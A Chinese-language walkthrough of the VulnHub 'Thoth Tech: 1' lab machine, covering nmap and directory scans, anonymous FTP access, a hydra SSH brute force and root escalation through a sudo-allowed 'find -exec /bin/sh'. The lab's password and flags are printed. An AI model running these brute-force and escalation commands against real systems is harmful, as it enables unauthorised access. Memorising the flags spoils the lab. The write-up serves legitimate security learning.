免责声明:本文记录的是 Thoth Tech: 1 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
要求:
1、获得user的flag
2、获得root的flag环境:
https://download.vulnhub.com/thothtech/Thoth-Tech.ova一、信息收集
1、探测目标IP地址
arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:e0:71:d3 PCS Systemtechnik GmbH
192.168.5.12 08:00:27:1b:a5:e6 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.118 seconds (120.87 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 06:24 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:E0:71:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.12
Host is up (0.00016s latency).
MAC Address: 08:00:27:1B:A5:E6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.79 seconds目标IP:192.168.5.122、探测目标IP开放端口
nmap -sV -p- 192.168.5.12┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 06:25 -0400
Nmap scan report for 192.168.5.12
Host is up (0.000097s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:1B:A5:E6 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds端口:21、22、803、目录探测
dirsearch -u http://192.168.5.12┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.12
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.5.12/_26-03-11_06-26-54.txt
Target: http://192.168.5.12/
[06:26:54] Starting:
[06:26:55] 403 - 277B - /.ht_wsr.txt
[06:26:55] 403 - 277B - /.htaccess.bak1
[06:26:55] 403 - 277B - /.htaccess.orig
[06:26:55] 403 - 277B - /.htaccess.sample
[06:26:55] 403 - 277B - /.htaccess.save
[06:26:55] 403 - 277B - /.htaccess_extra
[06:26:55] 403 - 277B - /.htaccess_orig
[06:26:55] 403 - 277B - /.htaccess_sc
[06:26:55] 403 - 277B - /.htaccessBAK
[06:26:55] 403 - 277B - /.htaccessOLD
[06:26:55] 403 - 277B - /.htaccessOLD2
[06:26:55] 403 - 277B - /.htm
[06:26:55] 403 - 277B - /.html
[06:26:55] 403 - 277B - /.htpasswd_test
[06:26:55] 403 - 277B - /.htpasswds
[06:26:55] 403 - 277B - /.httr-oauth
[06:26:56] 403 - 277B - /.php
[06:27:22] 403 - 277B - /server-status/
[06:27:22] 403 - 277B - /server-status
[06:27:25] 200 - 7B - /test.php
[06:27:30] 200 - 2KB - /wordpress/wp-login.php
[06:27:30] 301 - 0B - /wordpress/ -> http://192.168.1.8/wordpress/
Task Completeddirb http://192.168.5.12┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.12
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 11 06:28:05 2026
URL_BASE: http://192.168.5.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.12/ ----
+ http://192.168.5.12/index.html (CODE:200|SIZE:10918)
+ http://192.168.5.12/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.5.12/wordpress/
---- Entering directory: http://192.168.5.12/wordpress/ ----
+ http://192.168.5.12/wordpress/index.php (CODE:200|SIZE:19705)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-includes/
+ http://192.168.5.12/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/ ----
+ http://192.168.5.12/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/includes/
+ http://192.168.5.12/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-admin/user/
---- Entering directory: http://192.168.5.12/wordpress/wp-content/ ----
+ http://192.168.5.12/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.5.12/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.5.12/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/network/ ----
+ http://192.168.5.12/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.12/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-admin/user/ ----
+ http://192.168.5.12/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.12/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/plugins/ ----
+ http://192.168.5.12/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/themes/ ----
+ http://192.168.5.12/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.12/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Mar 11 06:28:15 2026
DOWNLOADED: 36896 - FOUND: 13gobuster dir -u http://192.168.5.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.12
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 316] [--> http://192.168.5.12/wordpress/]
/test.php (Status: 200) [Size: 7]
/server-status (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
二、漏洞利用
1、访问ftp
ftp 192.168.5.12
用户:anonymous
ls
get note.txt
exit
cat note.txt┌──(root㉿kali)-[~]
└─# ftp 192.168.5.12
Connected to 192.168.5.12.
220 (vsFTPd 3.0.3)
Name (192.168.5.12:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||12986|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 110 Jul 02 2021 note.txt
226 Directory send OK.
ftp>
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||24173|)
150 Opening BINARY mode data connection for note.txt (110 bytes).
100% |*******************************************| 110 70.57 KiB/s 00:00 ETA
226 Transfer complete.
110 bytes received in 00:00 (58.60 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[~]
└─# cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
翻译后:
尊敬的 pwnlab :
我的名字是杰克。你的密码很弱,很容易被破解,我觉得你应该更改一下密码。根据文件信息,猜测存在一个账户pwnlab并且存在弱口令。
2、ssh
a、破解
hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.5.12┌──(root㉿kali)-[~]
└─# hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.5.12
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-11 06:34:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.5.12:22/
[22][ssh] host: 192.168.5.12 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-11 06:35:02
成功获得账户密码:babygirl1。
b、ssh登录
ssh pwnlab@192.168.5.12
密码:babygirl1┌──(root㉿kali)-[~]
└─# ssh pwnlab@192.168.5.12
The authenticity of host '192.168.5.12 (192.168.5.12)' can't be established.
ED25519 key fingerprint is: SHA256:92r1ZGJ7wYMcpzTK4CtNCLO1ib7UJVa+pSM1K3y/guc
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.12' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
pwnlab@192.168.5.12's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 11 Mar 2026 10:35:19 AM UTC
System load: 0.01 Processes: 123
Usage of /: 24.8% of 19.56GB Users logged in: 0
Memory usage: 26% IPv4 address for enp0s3: 192.168.5.12
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jul 2 09:14:12 2021 from 192.168.1.11
pwnlab@thothtech:~$ 获得user的flag
pwnlab@thothtech:~$ ls
user.txt
pwnlab@thothtech:~$
pwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
pwnlab@thothtech:~$ 三、权限提升
1、查看当前账户是否存在可以使用的特权命令
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$ 2、提权
sudo find . -exec /bin/sh \; -quitpwnlab@thothtech:~$ sudo find . -exec /bin/sh \; -quit
#
#
#
# id
uid=0(root) gid=0(root) groups=0(root)
#
# whoami
root
#
# cd /root
#
# ls
root.txt snap
#
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job :)
# user:
5ec2a44a73e7b259c6b0abc174291359
root:
d51546d5bcf8e3856c7bff5d201f0df6